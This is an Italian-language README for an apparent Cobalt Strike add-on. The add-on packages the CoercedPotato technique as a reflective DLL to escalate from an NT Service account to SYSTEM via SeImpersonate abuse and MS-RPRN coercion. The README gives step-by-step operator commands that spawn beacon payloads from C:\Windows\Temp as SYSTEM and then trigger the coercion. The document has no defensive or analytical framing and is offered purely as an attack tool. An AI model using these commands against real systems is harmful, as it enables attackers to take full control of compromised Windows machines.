
Reflective DLL per elevare i privilegi da NT Service a SYSTEM tramite il privilegio SeImpersonateToken
Elevazione dei privilegi da NT Service a SYSTEM sfruttando il privilegio SeImpersonateToken e le funzioni MS-RPRN.
Fortemente basato su https://github.com/Prepouce/CoercedPotato
Reflective Loader da https://github.com/stephenfewer/ReflectiveDLLInjection.
Clona questo repository e compila il progetto in VisualStudio, quindi carica dist/coercedpotato.cna in CobaltStrike.
Per prima cosa devi avviare il listener RPC con
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
per esempio
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
quindi puoi innescare una chiamata SYSTEM
beacon> CoercedPotato coerce